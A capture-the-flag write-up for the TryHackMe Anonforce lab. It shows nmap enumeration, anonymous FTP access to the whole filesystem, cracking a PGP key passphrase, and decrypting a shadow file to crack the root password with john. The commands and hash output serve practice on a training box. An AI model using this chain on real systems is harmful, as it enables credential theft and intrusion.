TryHackMe Anonforce Writeup
This writeup will help you solve the TryHackMe Anonforce box. Before we start enumerating the box, add the following line to your /etc/hosts file.
echo "<box_ip> anonforce.thm" >> /etc/hosts
TryHackMe Anonforce – Enumeration
We start by checking which ports are open on the server. To do so we use a tool called nmap. Now run the command listed below:
nmap -sV -sC anonforce.thm
The sV flag is used to find version information. The sC flag is used to run some default scripting against the target. The output can be seen below:
PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxr-xr-x 2 0 0 4096 Aug 11 2019 bin | drwxr-xr-x 3 0 0 4096 Aug 11 2019 boot | drwxr-xr-x 17 0 0 3700 Jan 05 12:48 dev | drwxr-xr-x 85 0 0 4096 Aug 13 2019 etc | drwxr-xr-x 3 0 0 4096 Aug 11 2019 home | lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img -> boot/initrd.img-4.4.0-157-generic | lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic | drwxr-xr-x 19 0 0 4096 Aug 11 2019 lib | drwxr-xr-x 2 0 0 4096 Aug 11 2019 lib64 | drwx------ 2 0 0 16384 Aug 11 2019 lost+found | drwxr-xr-x 4 0 0 4096 Aug 11 2019 media | drwxr-xr-x 2 0 0 4096 Feb 26 2019 mnt | drwxrwxrwx 2 1000 1000 4096 Aug 11 2019 notread [NSE: writeable] | drwxr-xr-x 2 0 0 4096 Aug 11 2019 opt | dr-xr-xr-x 101 0 0 0 Jan 05 12:48 proc | drwx------ 3 0 0 4096 Aug 11 2019 root | drwxr-xr-x 18 0 0 540 Jan 05 12:48 run | drwxr-xr-x 2 0 0 12288 Aug 11 2019 sbin | drwxr-xr-x 3 0 0 4096 Aug 11 2019 srv | dr-xr-xr-x 13 0 0 0 Jan 05 12:48 sys | drwxrwxrwt 9 0 0 4096 Jan 05 12:48 tmp [NSE: writeable] | drwxr-xr-x 10 0 0 4096 Aug 11 2019 usr | drwxr-xr-x 11 0 0 4096 Aug 11 2019 var | lrwxrwxrwx 1 0 0 30 Aug 11 2019 vmlinuz -> boot/vmlinuz-4.4.0-157-generic |_lrwxrwxrwx 1 0 0 30 Aug 11 2019 vmlinuz.old -> boot/vmlinuz-4.4.0-142-generic | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.9.8.169 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8a:f9:48:3e:11:a1:aa:fc:b7:86:71:d0:2a:f6:24:e7 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDkGQ8G5TDLFJY+zMp5dEj6XUwoH7ojGBjGkOmAf6d9PuIsf4DPFJQmoCA/eiSZpIwfQ14hVhXJHTclmcCd+2OeriuLXq0fEn+aHTo5X82KADkJibmel86qS7ToCzcaROnUkJU17mY3MuyTbfxuqmSvTv/7NI0zRW+cJ+cqwmeSZyhLnOHZ9GT5Y3Lbpvt2w0ktQ128POyaO4GrGA0EERWstIxExpqLaLsqjQPE/hBnIgZXZjd6EL1gn1/CSQnJVdLesIWMcvT5qnm9dZn/ysvysdHHaHylCSKIx5Qu9LtsitssoglpDlhXu5kr2do6ncWMAdTW75asBh+VE+QVX3vV | 256 73:5d:de:9a:88:6e:64:7a:e1:87:ec:65:ae:11:93:e3 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAq1VuleOFZpJb73D/25H1l0wp9Cs/SGwWIjwtGW0/2/20+xMsac5E8rACtXtLaAuL3Dk/IRSrORuEfU11R0H3A= | 256 56:f9:9f:24:f1:52:fc:16:b7:7b:a3:e2:4f:17:b4:ea (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIiId/YCdJZgD4/DG314U2CpAu8Y13DAx7AQ+JX+3zVc Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Ports 21 and 22 are open. It seems like a FTP server is running on port 21. Anonymous users are allowed to access the FTP share. The other service is running on port 22 and is a SSH server. It seems like we are able to get the user flag right away! Log into the FTP server by running the following commands:
ftp anonforce.thm anonymous anonymous
TryHackMe Anonforce – User Flag
Now to get the user.txt flag you can check the following console snippet and run the commands yourself!
Remote system type is UNIX. Using binary mode to transfer files. ftp> cd home 250 Directory successfully changed. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 4 1000 1000 4096 Aug 11 2019 melodias 226 Directory send OK. ftp> cd melodias 250 Directory successfully changed. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-rw-r-- 1 1000 1000 33 Aug 11 2019 user.txt 226 Directory send OK. ftp> mget user.txt mget user.txt? Y 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for user.txt (33 bytes). 226 Transfer complete.
Now on your local machine run: cat user.txt to get the content of the user.txt flag.
TryHackMe Anonforce – Root Flag
Another interesting directory we found in the / directory is the notread directory. Get all the files within this directory by running:
cd /notread mget *
You should now have downloaded both the backup.pgp file and the private.asc file. It seems like the private.asc file is a key for the encrypted backup.pgp file. We can try to decrypt the file with the given key. To do so run:
gpg --import private.asc
This however will not succeed. We need a password in order to load the secret pgp key. Luckily we can use the tools provided by openwall.com to crack the password. Within kali linux the john toolset is already installed. The toolset also contain some hash converters. We can convert the pgp key to a hash by running:
gpg2john private.asc > hash
Now crack the hash by running:
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Which gives the following output:
******* (anonforce)
Nice we found the password! We are now able to decrypt the backup file. Run the following command to get the content of this file:
gpg --decrypt backup.pgp
The output is:
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7::: daemon:*:17953:0:99999:7::: bin:*:17953:0:99999:7::: sys:*:17953:0:99999:7::: sync:*:17953:0:99999:7::: games:*:17953:0:99999:7::: man:*:17953:0:99999:7::: lp:*:17953:0:99999:7::: mail:*:17953:0:99999:7::: news:*:17953:0:99999:7::: uucp:*:17953:0:99999:7::: proxy:*:17953:0:99999:7::: www-data:*:17953:0:99999:7::: backup:*:17953:0:99999:7::: list:*:17953:0:99999:7::: irc:*:17953:0:99999:7::: gnats:*:17953:0:99999:7::: nobody:*:17953:0:99999:7::: systemd-timesync:*:17953:0:99999:7::: systemd-network:*:17953:0:99999:7::: systemd-resolve:*:17953:0:99999:7::: systemd-bus-proxy:*:17953:0:99999:7::: syslog:*:17953:0:99999:7::: _apt:*:17953:0:99999:7::: messagebus:*:18120:0:99999:7::: uuidd:*:18120:0:99999:7::: melodias:$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1:18120:0:99999:7::: sshd:*:18120:0:99999:7::: ftp:*:18120:0:99999:7:::
Cracking the root hash
We can see the hashes for both the melodias and the root user here. Now, to get the password hashes we use the in-built unshadow function. Log into the FTP server again and get the /etc/passwd file.
ftp anonforce.thm anonymous anonymous cd /etc/ mget passwd
Now run:
unshadow passwd shadow > ssh_hash
Now use john again to crack the hash.
john ssh_hash --wordlist=/usr/share/wordlists/rockyou.txt
In a short amount of time, you should find the password. Use it to log into the server using ssh.
ssh [email protected]
The root flag is located at /root/root.txt.
This was a fun box to root! To provide a safe FTP server you should disable the anonymous login. Furthermore, you should never give FTP access to the root directory of the system. By doing so, an attacker might have access to all the files on the system.
